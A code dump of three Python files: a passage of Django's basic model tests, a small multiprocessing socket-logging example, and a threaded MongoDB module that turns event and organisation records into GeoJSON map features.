Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(
Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"]
)
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'), ["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
def test_microsecond_precision(self):
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date, datetime(2005, 7, 31, 12, 30, 45, 180))
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"]
)
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline, '\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.bulk_create([
Article(headline='Article 10', pub_date=datetime(2005, 7, 31, 12, 30, 45)),
Article(headline='Article 11', pub_date=datetime(2008, 1, 1)),
Article(headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999)),
])
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual(
[sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]]
)
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.bulk_create([
Article(headline='Article 10', pub_date=datetime(2005, 7, 31, 12, 30, 45)),
Article(headline='Article 11', pub_date=datetime(2008, 1, 1)),
Article(headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999)),
])
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_gettext_lazy(self):
"""
gettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = gettext_lazy(notlazy)
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
msg = "EmptyQuerySet can't be instantiated"
with self.assertRaisesMessage(TypeError, msg):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
self.assertNotIsInstance('', EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
a = Article()
self.assertEqual(a, a)
self.assertEqual(a, mock.ANY)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
msg = 'Model instances without primary key value are unhashable'
with self.assertRaisesMessage(TypeError, msg):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
def test_missing_hash_not_inherited(self):
class NoHash(models.Model):
def __eq__(self, other):
return super().__eq__(other)
with self.assertRaisesMessage(TypeError, "unhashable type: 'NoHash'"):
hash(NoHash(id=1))
def test_specified_parent_hash_inherited(self):
class ParentHash(models.Model):
def __eq__(self, other):
return super().__eq__(other)
__hash__ = models.Model.__hash__
self.assertEqual(hash(ParentHash(id=1)), 1)
def test_delete_and_access_field(self):
# Accessing a field after it's deleted from a model reloads its value.
pub_date = datetime.now()
article = Article.objects.create(headline='foo', pub_date=pub_date)
new_pub_date = article.pub_date + timedelta(days=10)
article.headline = 'bar'
article.pub_date = new_pub_date
del article.headline
with self.assertNumQueries(1):
self.assertEqual(article.headline, 'foo')
# Fields that weren't deleted aren't reloaded.
self.assertEqual(article.pub_date, new_pub_date)
def test_multiple_objects_max_num_fetched(self):
max_results = MAX_GET_RESULTS - 1
Article.objects.bulk_create(
Article(headline='Area %s' % i, pub_date=datetime(2005, 7, 28))
for i in range(max_results)
)
self.assertRaisesMessage(
MultipleObjectsReturned,
'get() returned more than one Article -- it returned %d!' % max_results,
Article.objects.get,
headline__startswith='Area',
)
Article.objects.create(headline='Area %s' % max_results, pub_date=datetime(2005, 7, 28))
self.assertRaisesMessage(
MultipleObjectsReturned,
'get() returned more than one Article -- it returned more than %d!' % max_results,
Article.objects.get,
headline__startswith='Area',
)
class ModelLookupTest(TestCase):
@classmethod
def setUpTestData(cls):
# Create an Article.
cls.a = Article(
id=None,
headline='Swallow programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
cls.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Parrot programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(), ['<Article: Parrot programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
with self.assertRaisesMessage(ObjectDoesNotExist, "Article matching query does not exist."):
Article.objects.get(id__exact=2000,)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
with self.assertRaises(ObjectDoesNotExist):
Article.objects.get(pub_date__year=2005, pub_date__month=8)
with self.assertRaisesMessage(ObjectDoesNotExist, "Article matching query does not exist."):
Article.objects.get(pub_date__week_day=6,)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]), ["<Article: Swallow programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Swallow bites Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
msg = "get() returned more than one Article -- it returned 2!"
with self.assertRaisesMessage(MultipleObjectsReturned, msg):
Article.objects.get(headline__startswith='Swallow',)
with self.assertRaisesMessage(MultipleObjectsReturned, msg):
Article.objects.get(pub_date__year=2005,)
with self.assertRaisesMessage(MultipleObjectsReturned, msg):
Article.objects.get(pub_date__year=2005, pub_date__month=7)
class ConcurrentSaveTests(TransactionTestCase):
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(SimpleTestCase):
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'bulk_update',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'explain',
'_insert',
'_update',
'raw',
'union',
'intersection',
'difference',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet)),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(2):
asos.save()
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
with self.assertRaisesMessage(DatabaseError, 'Forced update did not affect any rows.'):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
select_on_save works correctly if the database doesn't return correct
information about matched rows from UPDATE.
"""
# Change the manager to not return "row matched" for update().
# We are going to change the Article's _base_manager class
# dynamically. This is a bit of a hack, but it seems hard to
# test this properly otherwise. Article's manager, because
# proxy models use their parent model's _base_manager.
orig_class = Article._base_manager._queryset_class
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super()._update(*args, **kwargs)
return 0
try:
Article._base_manager._queryset_class = FakeQuerySet
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaisesMessage(DatabaseError, 'Forced update did not affect any rows.'):
asos.save(force_update=True)
msg = (
"An error occurred in the current transaction. You can't "
"execute queries until the end of the 'atomic' block."
)
with self.assertRaisesMessage(DatabaseError, msg):
asos.save(update_fields=['pub_date'])
finally:
Article._base_manager._queryset_class = orig_class
class ModelRefreshTests(TestCase):
def test_refresh(self):
a = Article.objects.create(pub_date=datetime.now())
Article.objects.create(pub_date=datetime.now())
Article.objects.filter(pk=a.pk).update(headline='new headline')
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_unknown_kwarg(self):
s = SelfRef.objects.create()
msg = "refresh_from_db() got an unexpected keyword argument 'unknown_kwarg'"
with self.assertRaisesMessage(TypeError, msg):
s.refresh_from_db(unknown_kwarg=10)
def test_lookup_in_fields(self):
s = SelfRef.objects.create()
msg = 'Found "__" in fields argument. Relations and transforms are not allowed in fields.'
with self.assertRaisesMessage(ValueError, msg):
s.refresh_from_db(fields=['foo__bar'])
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = datetime.now()
a = Article.objects.create(pub_date=pub_date)
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_fk_on_delete_set_null(self):
a = Article.objects.create(
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
s1 = SelfRef.objects.create(article=a)
a.delete()
s1.refresh_from_db()
self.assertIsNone(s1.article_id)
self.assertIsNone(s1.article)
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
def test_refresh_clears_reverse_related(self):
"""refresh_from_db() clear cached reverse relations."""
article = Article.objects.create(
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertFalse(hasattr(article, 'featured'))
FeaturedArticle.objects.create(article_id=article.pk)
article.refresh_from_db()
self.assertTrue(hasattr(article, 'featured'))
def test_refresh_clears_one_to_one_field(self):
article = Article.objects.create(
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
featured = FeaturedArticle.objects.create(article_id=article.pk)
self.assertEqual(featured.article.headline, 'Parrot programs in Python')
article.headline = 'Parrot programs in Python 2.0'
article.save()
featured.refresh_from_db()
self.assertEqual(featured.article.headline, 'Parrot programs in Python 2.0')
def test_prefetched_cache_cleared(self):
a = Article.objects.create(pub_date=datetime(2005, 7, 28))
s = SelfRef.objects.create(article=a)
# refresh_from_db() without fields=[...]
a1_prefetched = Article.objects.prefetch_related('selfref_set').first()
self.assertCountEqual(a1_prefetched.selfref_set.all(), [s])
s.article = None
s.save()
# Relation is cleared and prefetch cache is stale.
self.assertCountEqual(a1_prefetched.selfref_set.all(), [s])
a1_prefetched.refresh_from_db()
# Cache was cleared and new results are available.
self.assertCountEqual(a1_prefetched.selfref_set.all(), [])
# refresh_from_db() with fields=[...]
a2_prefetched = Article.objects.prefetch_related('selfref_set').first()
self.assertCountEqual(a2_prefetched.selfref_set.all(), [])
s.article = a
s.save()
# Relation is added and prefetch cache is stale.
self.assertCountEqual(a2_prefetched.selfref_set.all(), [])
a2_prefetched.refresh_from_db(fields=['selfref_set'])
# Cache was cleared and new results are available.
self.assertCountEqual(a2_prefetched.selfref_set.all(), [s])
|
example_succeeded.py
|
from logging_server import LoggingServer, SocketLogger
import logging, sys
def process(process_name:str) -> None:
logger = SocketLogger(process_name)
logger.info(f"Start {process_name}")
# ... some process ...
if __name__ == "__main__":
import multiprocessing as mp
logger = logging.getLogger() # root logger
logger.addHandler(logging.StreamHandler(sys.stdout)) # output to console.
logger.setLevel(logging.NOTSET) # lowest logger level
ls = LoggingServer()
ls.start()
print("start processes.")
for i in range(10):
p = mp.Process(target=process, args=(f"process {i}",))
p.start()
|
thread_GIS.py
|
from threading import Thread,Lock
from api.GIS.config import GIS_mgdb_config
from api.GIS.database.mongoDB import MGO
import json
from api.GIS.GISStaticsFun import GisStaticsFun
class TheadFun():
def __init__(self):
pass
# self.param = param
def queryQBByIds(self,ids):
DBConfig = []
for cf in GIS_mgdb_config.dataBaseConfig:
ctype = cf['type']
if ctype == 'event' or ctype == 'org':
DBConfig.append(cf)
LocationInfo = {}
features = []
event_ids = []
org_ids = []
for id in ids:
if len(id) < 20:
org_ids.append(id)
else:
event_ids.append(id)
threads = [Thread(target=TheadFun.queryDBById,args=(cf,ids,LocationInfo)) for cf in DBConfig]
# threads_org = [Thread(target=TheadFun.queryOrgById,args=(cf,org_ids,LocationInfo)) for cf in orgDBConfig]
for t in threads:
t.start()
for t in threads:
t.join()
features = TheadFun.getFeaturesByLocationInfo(LocationInfo)
return features
@staticmethod
def queryDBById(cf, ids, LocationInfo):
cType = cf['type']
if cType == "event":
TheadFun.queryEventById(cf, ids, LocationInfo)
else:
TheadFun.queryOrgAndTarById(cf, ids, LocationInfo)
@staticmethod
def queryOrgAndTarById(cf, ids, LocationInfo):
mg = MGO(host=cf['host'], port=cf['port'], user=cf['user'], pwd=cf['pwd'],dbname=cf['dbname'])
dbName = cf['dbname']
collName = cf['collName']
fieldConfig = GIS_mgdb_config.fieldConfig
fieldconfig = fieldConfig[dbName][collName]
locationListKey = fieldconfig["locationList"]
QBIdKey = fieldconfig["QBId"]
TypeKey = fieldconfig["type"]
locationNameKey = fieldconfig["locationName"]
# assumed to mirror queryEventById's config keys so getHeatAttr() has its inputs;
# .get() avoids a KeyError if the org/target collections do not define them
EventAttrKey = fieldconfig.get("EventAttr")
showHeatAttr = fieldconfig.get("showHeatAttr")
findObj = {QBIdKey:{'$in':ids}}
rows = mg.find(collName,findObj)
for row in rows:
try:
EventId = str(row[QBIdKey])
localName = row[locationNameKey]
locationlist = row[locationListKey]
Type = row[TypeKey]
for index,locationItem in enumerate(locationlist):
geometry = locationItem
X = str(geometry['coordinates'][0])
Y = str(geometry['coordinates'][1])
ident = "event&" + X + Y
heatAttr = GisStaticsFun.getHeatAttr(row, showHeatAttr, EventAttrKey)  # heat-map attribute
Param = TheadFun.getParam(EventId, index, Type, heatAttr)  # build the param payload using the record type read above
location = geometry
TheadFun.getEventLocationInfo(Param, ident, location, localName, LocationInfo)  # group by location
except:
print(row["_id"] + "失败!")
@staticmethod
def queryEventById(cf, ids, LocationInfo):
mg = MGO(host=cf['host'], port=cf['port'], user=cf['user'], pwd=cf['pwd'],dbname=cf['dbname'])
dbName = cf['dbname']
collName = cf['collName']
fieldConfig = GIS_mgdb_config.fieldConfig
fieldconfig = fieldConfig[dbName][collName]
locationListKey = fieldconfig["locationList"]
QBIdKey = fieldconfig["QBId"]
SubtypeKey = fieldconfig["Subtype"]
EventAttrKey = fieldconfig["EventAttr"]
showHeatAttr = fieldconfig["showHeatAttr"]
findObj = {QBIdKey:{'$in':ids}}
rows = mg.find(collName,findObj)
for row in rows:
try:
EventId = str(row[QBIdKey])
localName = row[locationListKey][0]['name']
locationlist = row[locationListKey]
eventType = row[SubtypeKey]
for index,locationItem in enumerate(locationlist):
geometry = locationItem['geometry']
X = str(geometry['coordinates'][0])
Y = str(geometry['coordinates'][1])
ident = "event&" + X + Y
heatAttr = GisStaticsFun.getHeatAttr(row, showHeatAttr, EventAttrKey)  # heat-map attribute
Param = TheadFun.getParam(EventId, index, eventType, heatAttr)  # build the param payload
location = geometry
TheadFun.getEventLocationInfo(Param, ident, location, localName, LocationInfo)  # group by location
except:
print(row["_id"] + "失败!")
def exploreEvents(self,geometryStrArr):
eventsDBConfig = GIS_mgdb_config.dataBaseConfig['event']
LocationInfo = {}
features = []
threads = [Thread(target=TheadFun.spatialQueryDB,args=(cf,geometryStrArr,LocationInfo)) for cf in eventsDBConfig]
for t in threads:
t.start()
for t in threads:
t.join()
features = TheadFun.getFeaturesByLocationInfo(LocationInfo)
return features
@staticmethod
def spatialQueryDB(cf,geometryStrArr,LocationInfo):
mg = MGO(host=cf['host'], port=cf['port'], user=cf['user'], pwd=cf['pwd'],dbname=cf['dbname'])
dbName = cf['dbname']
collName = cf['collName']
fieldConfig = GIS_mgdb_config.fieldConfig
fieldconfig = fieldConfig[dbName][collName]
locationListKey = fieldconfig["locationList"]
geometryKey = fieldconfig["geometry"]
QBIdKey = fieldconfig["QBId"]
SubtypeKey = fieldconfig["Subtype"]
EventAttrKey = fieldconfig["EventAttr"]
showHeatAttr = fieldconfig["showHeatAttr"]
findOrArr = []
for geometryStr in geometryStrArr:
geometryObj = json.loads(geometryStr)
findO_point = {locationListKey:{'$elemMatch':{geometryKey:{"$within":{"$geometry":geometryObj}}}}}
findOrArr.append(findO_point)
findObj = {'$or':findOrArr}
rows = mg.find(collName,findObj)
for row in rows:
try:
EventId = str(row[QBIdKey])
localName = row[locationListKey][0]['name']
locationlist = row[locationListKey]
eventType = row[SubtypeKey]
for index,locationItem in enumerate(locationlist):
geometry = locationItem['geometry']
isIntersect = True
if len(geometry['coordinates']) == 0 or geometry['coordinates'][0] == '' or geometry['coordinates'][1] == '':  # skip records with malformed coordinates
continue
# drop locations in locationList whose coordinates fall outside the passed-in geometry
if len(locationlist) > 1:
isIntersect = False
for geometryStr in geometryStrArr:
geometryObj = json.loads(geometryStr)
isIntersect = GisStaticsFun.isIntersert(geometry,geometryObj)
if isIntersect:
break
if not isIntersect:  # check whether each place in locationlist falls inside the queried area
continue
X = str(geometry['coordinates'][0])
Y = str(geometry['coordinates'][1])
ident = "event&" + X + Y
heatAttr = GisStaticsFun.getHeatAttr(row,showHeatAttr,EventAttrKey)
Param = TheadFun.getParam(EventId,index,eventType,heatAttr)
location = geometry
TheadFun.getEventLocationInfo(Param,ident,location,localName,LocationInfo)
except:
print(row["_id"] + "失败!")
@staticmethod
def getParam(EventId,index,eventType,heatAttr):
Param = {
"ParamId":EventId+"#"+str(index),
"QBId":EventId,
'QBType':eventType,
"heatAttr":heatAttr
}
return Param
@staticmethod
def getEventLocationInfo(Param,ident,location,localName,LocationInfo):
if(ident in LocationInfo):
EventArr = LocationInfo[ident]['Params']
EventArr.append(Param)
else:
LocationInfo[ident] = {
"Params":[Param],
"location":location,
"localName":localName
}
@staticmethod
def getFeaturesByLocationInfo(LocationInfo):
features = []
for k,v in LocationInfo.items():
location = v['location']
featureId = k
params = v['Params']
localname = v['localName']
feature = {
"type": "Feature",
"id": featureId,
"geometry": location,
"properties": {
'Params':params,
'locationName':localname,
'selectedNum':len(params)
}
}
features.append(feature)
return features
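# Illustrative sketch (hypothetical ids and values, demo only): how a LocationInfo
# entry built by getEventLocationInfo becomes a GeoJSON-style feature.
def _location_info_example():
    info = {}
    param = TheadFun.getParam("event-1", 0, "meeting", {"count": 3})
    TheadFun.getEventLocationInfo(param, "event&116.439.90",
                                  {"type": "Point", "coordinates": [116.4, 39.9]},
                                  "Beijing", info)
    return TheadFun.getFeaturesByLocationInfo(info)  # one feature with selectedNum == 1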
####======================================####
|